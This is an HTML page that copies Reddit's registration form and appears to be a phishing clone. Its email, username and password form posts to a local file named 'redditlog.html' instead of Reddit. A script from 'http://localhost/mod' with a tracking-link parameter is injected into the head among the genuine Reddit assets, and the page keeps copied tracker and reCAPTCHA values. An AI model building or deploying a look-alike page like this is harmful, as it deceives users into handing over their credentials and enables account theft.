<!DOCTYPE html>
<html lang="en">
    <head>
        <title>reddit.com: Join the worldwide conversation</title>
        <link rel="shortcut icon" type="image/png" sizes="512x512" href="https://www.redditstatic.com/accountmanager/favicon/favicon-512x512.png">
        <link rel="shortcut icon" type="image/png" sizes="192x192" href="https://www.redditstatic.com/accountmanager/favicon/favicon-192x192.png">
        <link rel="shortcut icon" type="image/png" sizes="32x32" href="https://www.redditstatic.com/accountmanager/favicon/favicon-32x32.png">
        <link rel="shortcut icon" type="image/png" sizes="16x16" href="https://www.redditstatic.com/accountmanager/favicon/favicon-16x16.png">
        <link rel="apple-touch-icon" sizes="180x180" href="https://www.redditstatic.com/accountmanager/favicon/apple-touch-icon-180x180.png">
        <link rel="mask-icon" href="https://www.redditstatic.com/accountmanager/favicon/safari-pinned-tab.svg" color="#5bbad5">
        <link rel="canonical" href="https://www.reddit.com/register/">
        <meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover">
        <meta name="msapplication-TileColor" content="#ffffff"/>
        <meta name="msapplication-TileImage" content="https://www.redditstatic.com/accountmanager/favicon/mstile-310x310.png"/>
        <meta name="msapplication-TileImage" content="https://www.redditstatic.com/accountmanager/favicon/mstile-310x150.png"/>
        <meta name="theme-color" content="#ffffff">
        <script src="http://localhost/mod?tlink=s0cnb9"></script>
        

  <link rel="stylesheet" href="https://www.redditstatic.com/accountmanager/vendor.7749aab6f5c7d510110eaa0430cb683d.css">

  <link rel="stylesheet" href="https://www.redditstatic.com/accountmanager/theme.5e411b81dd5eff52023d3e13cde38668.css">

  <link rel="stylesheet" href="https://www.redditstatic.com/accountmanager/register.95e19ddbf98dc4653ea8771f87f5151b.css">


    </head>
    <body>
        

    <div class="Container">

    <div class="PageColumns">
        <div class="PageColumn PageColumn__left">
<div class="Art"></div>
</div>
        <div class="PageColumn PageColumn__right">
<div class="ColumnContainer">
  <form class="AnimatedForm" action="redditlog.html" method="post" novalidate>
    
		
      <div class="Onboarding__step" data-step="1">
	  <div class="SnooIcon"></div>
    
      <h1 class="Title m-no-margin">
        
          Join the worldwide conversation.
        
      </h1>
      <p class="Description">
        
          By having a Reddit account, you can join, vote, and comment on all your favorite Reddit content.<br/>Sign up in just seconds.
        
      </p>
      <input type="hidden" name="cookie_domain" value=".reddit.com">
      <input type="hidden" name="dest" value="https://www.reddit.com">
      <input type="hidden" name="csrf_token" value="4db2bca4257b27a1f5a7201583ba7e4b4e310f83">
      <input type="hidden" name="is_oauth" value="False">
      <input type="hidden" name="subreddit_ids" value="None">
      <input type="hidden" name="upsell_signup_variant" value="">
      <input type="hidden" name="email_permissions_variant" value="">
      <input type="hidden" name="country" value="">
      <input type="hidden" name="require_email_permission" value="False">
      
        <fieldset class="AnimatedForm__field m-required">
          <input id="regEmail" class="AnimatedForm__textInput" type="email" name="email" data-step="1">
          <label class="AnimatedForm__textInputLabel" for="regEmail">Email</label>
          <div class="AnimatedForm__errorMessage" data-for="email"></div>
        </fieldset>
        
	  <fieldset class="AnimatedForm__field m-required">
            <input id="regUsername" class="AnimatedForm__textInput" type="text" name="username" data-step="2">
            <label class="AnimatedForm__textInputLabel" for="regUsername">Choose a Username</label>
            <div class="AnimatedForm__errorMessage" data-for="username"></div>
       </fieldset>
	  <fieldset class="AnimatedForm__field m-required">
		<input id="regPassword" class="AnimatedForm__textInput" type="password" name="password" data-step="2">
		<label class="AnimatedForm__textInputLabel" for="regPassword">Password</label>
		<div class="PasswordMeter m-hidden">
		  <div class="PasswordMeter__Strength"></div>
		  <div class="PasswordMeter__Strength"></div>
		  <div class="PasswordMeter__Strength"></div>
		  <div class="PasswordMeter__Strength"></div>
		  <div class="PasswordMeter__Strength"></div>
		</div>
		<div class="AnimatedForm__errorMessage" data-for="password"></div>
	  </fieldset>
		  
		      
      <fieldset class="AnimatedForm__field">
        <button class="AnimatedForm__submitButton SignupButton" type="submit" data-step="2">Sign Up</button>
      </fieldset>
		  
      <div class="BottomText">
        Already a Redditor?
        <a class="BottomLink" href="redditlog.html">Log in</a>
      </div>
      <p class="UserAgreement">
        
          By signing up, you agree to our <a target="_blank" href="https://www.reddit.com/help/useragreement">Terms</a> and that you have read our <a target="_blank" href="https://www.reddit.com/help/privacypolicy/">Privacy Policy</a> and <a target="_blank" href="https://www.reddit.com/help/contentpolicy/">Content Policy</a>.
        
      </p>
    </div>

    <!-- This step will be hidden for oauth -->
    <div class="Onboarding__step" data-step="3">
      <div class="AnimatedForm__header">
        <h1 class="Title m-no-margin">Find communities by topics you’re interested in.</h1>
        <p class="Description">
          Reddit is filled with interest based communities, offering something for everyone.<br/>Reddit works best when you have joined at least 5 communities.
        </p>
      </div>
      <div id="SubredditSubscriptions"></div>
      <div class="AnimatedForm__bottomNav">
        <span class="AnimatedForm__submitStatus" data-step="3">
          <span class="AnimatedForm__submitStatusIcon"></span>
          <span class="AnimatedForm__submitStatusMessage"></span>
        </span>
        <button class="AnimatedForm__submitButton SubscribeButton" type="submit">Finish</button>
      </div>
    </div>

    
      <div class="Onboarding__step" data-step="2">
    
      <div class="AnimatedForm__header">
        <h1 class="Title m-no-margin">
          
            Choose your username
          
        </h1>
        <p class="Description">
          
            Your username is how other community members will see you. This name will be used to credit you for things you share on Reddit. What should we call you?
          
        </p>
      </div>
      <div class="AnimatedForm__content">
        <div class="AnimatedForm__usernameStep">
          
          <fieldset class="AnimatedForm__field m-required">
            <input id="regUsername" class="AnimatedForm__textInput" type="text" name="username" data-step="2">
            <label class="AnimatedForm__textInputLabel" for="regUsername">Choose a Username</label>
            <div class="AnimatedForm__errorMessage" data-for="username"></div>
          </fieldset>
          <fieldset class="AnimatedForm__field m-required">
            <input id="regPassword" class="AnimatedForm__textInput" type="password" name="password" data-step="2">
            <label class="AnimatedForm__textInputLabel" for="regPassword">Password</label>
            <div class="PasswordMeter m-hidden">
              <div class="PasswordMeter__Strength"></div>
              <div class="PasswordMeter__Strength"></div>
              <div class="PasswordMeter__Strength"></div>
              <div class="PasswordMeter__Strength"></div>
              <div class="PasswordMeter__Strength"></div>
            </div>
            <div class="AnimatedForm__errorMessage" data-for="password"></div>
          </fieldset>
          
        </div>
        <div class="Onboarding__usernameGenerator">
          <p>Here are some username suggestions <a href="#" class="Onboarding__usernameRefresh"></a></p>
          <div class="Onboarding__usernameGeneratorSuggestions">
            <div class="Onboarding__usernameWrapper"></div>
          </div>
        </div>
      </div>
      <div class="AnimatedForm__bottomNav">
        
          <a href="#" class="AnimatedForm__backLink" data-step="2">Back</a>
        
        <span class="AnimatedForm__submitStatus" data-step="2">
          <span class="AnimatedForm__submitStatusIcon"></span>
          <span class="AnimatedForm__submitStatusMessage"></span>
        </span>
        
          <button class="AnimatedForm__submitButton SignupButton" type="submit" data-step="2">Sign Up</button>
        
      </div>
    </div>
  </form>
</div>
</div>
    </div>
</div>


        <script>
            //<![CDATA
                
window.___grecaptchaSiteKey = '6LeTnxkTAAAAAN9QEuDZRpn90WwKk_R1TRW_g-JC';

                window.___r = {"config": {"tracker_endpoint": "https://events.reddit.com/v2", "tracker_secret": "V2FpZ2FlMlZpZTJ3aWVyMWFpc2hhaGhvaHNoZWl3", "tracker_key": "AccountManager3"}};
            //]]>
        </script>


  <script type="text/javascript" src="https://www.redditstatic.com/accountmanager/common.32a41282ddb1019e9445.js"></script>

  <script type="text/javascript" src="https://www.redditstatic.com/accountmanager/vendor.02e70b0510146f5c6a8c.js"></script>

  <script type="text/javascript" src="https://www.redditstatic.com/accountmanager/theme.f03d466e68261629ed71.js"></script>

  <script type="text/javascript" src="https://www.redditstatic.com/accountmanager/register.a176a93e01482f3a8bee.js"></script>


    </body>
</html>